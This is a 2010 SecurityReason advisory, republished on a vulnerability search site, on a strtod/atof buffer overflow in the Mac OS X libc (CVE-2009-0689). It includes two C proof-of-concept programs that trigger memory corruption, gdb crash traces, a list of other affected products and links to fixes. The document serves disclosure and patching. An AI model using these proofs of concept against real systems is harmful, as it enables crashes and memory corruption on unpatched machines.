Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Mac OS X 10.5 / 10.6 libc/strtod(3) Buffer Overflow

Related Vulnerabilities: CVE-2009-0689  
Publish Date: 09 Jan 2010
Author: Maksymilian Arciemowicz, securityreason.com
Source 
                							

                -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- - Dis.: 07.05.2009
- - Pub.: 08.01.2010

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- - MacOS 10.6 

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/81


- --- 0.Description ---
Mac OS is the trademarked name for a series of graphical user interface-based operating systems developed by Apple Inc. (formerly Apple Computer, Inc.) for their Macintosh line of computer systems. The Macintosh user experience is credited with popularizing the graphical user interface. The original form of what Apple would later name the "Mac OS" was the integral and unnamed system software first introduced in 1984 with the original Macintosh, usually referred to simply as the System software.


- --- 1. MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ---
The main problem exist in dtoa implementation. MacOS X has the same dtoa as OpenBSD, NetBSD etc. This problem affects not only libc/gdtoa. Affected is also strtod(3) function.
For more information, please see SREASONRES:20090625.

http://securityreason.com/achievement_securityalert/63

but fix for SREASONRES:20090625, used by openbsd was not good.
More information about fix for openbsd and similars SREASONRES:20091030,

http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. In
Kmax has defined 15. Functions in dtoa, don't checks Kmax limit, and
it is possible to call 16<= elements of freelist array.

It is true that the examples presented in the previous notes, using the printf (1) do not work under MacOS X. This does not mean the MacOSX C library is safe.

More:
http://cwe.mitre.org/data/definitions/119.html


- --- 2. Proof of Concept (PoC) ---
- --- 2.1. strtod(3) buffer overflow example PoC ---
#include <stdio.h>
#include <stdlib.h>
 
int main ()
{

  char number[] = "0.1111111111...11", *e;

  double weed = strtod(number, &e);

  printf("grams = %lf\n", weed);
  return 0;

}

(gdb) r  
Starting program: /Volumes/ARC/299 
Reading symbols for shared libraries ++. done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x002271ac in __diff_D2A ()

(gdb) i r

eax            0xc71c71c7  -954437177
ecx            0xacb44  707396
edx            0x0  0
ebx            0x2c2e4f  2895439
esp            0xbffb65d0  0xbffb65d0
ebp            0xbffb6618  0xbffb6618
esi            0x39f000  3796992
edi            0x0  0
eip            0x2271ac  0x2271ac <__diff_D2A+246>
eflags         0x10246  66118
cs             0x17  23
ss             0x1f  31
ds             0x1f  31
es             0x1f  31
fs             0x0  0
gs             0x37  55

edi=0x0
eax=0xc71c71c7
eip=0x002271ac

(gdb) x/i 0x002271ac
0x2271ac <__diff_D2A+246>:  mov    %eax,(%esi)

- --- 2.2. atof(3) buffer overflow example PoC ---
#include <stdio.h>
#include <stdlib.h>

int
main()
{
  char s[]="111.111111...11";

  float a=atof(s);
  printf("%f",a);
}


x$ ls -la m0.c
- -rwxrwxrwx@ 1 x  staff  317507 Jan  3 14:23 m0.c
x$ gcc -o m0 m0.c
x$ ./m0
Bus error

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x00227017 in __lshift_D2A ()

(gdb) x/i 0x00227017 
0x227017 <__lshift_D2A+68>:  movl   $0x0,(%edx)
(gdb) i r
eax            0x16bc  5820
ecx            0x80b6  32950
edx            0x39f000  3796992
ebx            0x2c2e4f  2895439
esp            0xbffb2070  0xbffb2070
ebp            0xbffb20b8  0xbffb20b8
esi            0x26bd  9917
edi            0x80b7  32951
eip            0x227017  0x227017 <__lshift_D2A+68>
eflags         0x10203  66051
cs             0x17  23
ss             0x1f  31
ds             0x1f  31
es             0x1f  31
fs             0x0  0
gs             0x37  55
(gdb) bt
#0  0x00227017 in __lshift_D2A ()
#1  0x002c3b74 in strtod_l$UNIX2003 ()
#2  0x00275ba7 in atof ()
#3  0x000017eb in main ()


- --- 3. SecurityReason Note ---
Officialy SREASONRES:20090625 has been detected in:
- - OpenBSD
- - NetBSD
- - FreeBSD
- - MacOSX
- - Google Chrome
- - Mozilla Firefox
- - Mozilla Seamonkey
- - Mozilla Thunderbird
- - Mozilla Sunbird
- - Mozilla Camino
- - KDE (example: konqueror)
- - Opera
- - K-Meleon
- - F-Lock
- - MatLab
- - J

This list is not yet closed.
FreeBSD project has fixed this issue (state 2010-01-05) only in 
MAIN
RELENG_8_0_BP
RELENG_8_0_0_RELEASE
RELENG_8_0
RELENG_7
RELENG_6

Please note that the issue can also exist in Sony PlayStation 3.
The license of PS3 :

http://www.scei.co.jp/ps3-license/see.html

- ---
The separate 'dtoa.c' file is separately licenced, thus:
Copyright. 1991, 2000 by Lucent Technologies.
- ---

MacOS gdtoa have also  "Lucent Technologies" license from year 2000.


- --- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


- --- 5. Credits ---
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com


- --- 6. Greets ---
Infospec p_e_a pi3 


- --- 7. Contact ---
Email:
- - cxib {a.t] securityreason [d0t} com
- - sp3x {a.t] securityreason [d0t} com

GPG:
- - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- - http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database

-----BEGIN PGP SIGNATURE-----

iEYEARECAAYFAktGcnsACgkQpiCeOKaYa9aRzgCgth+8HlRjOPmeJNGc+wCplmmC
xsAAoNsMatpwiW8k93sTbjMayHfPna1a
=CHer
-----END PGP SIGNATURE-----
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started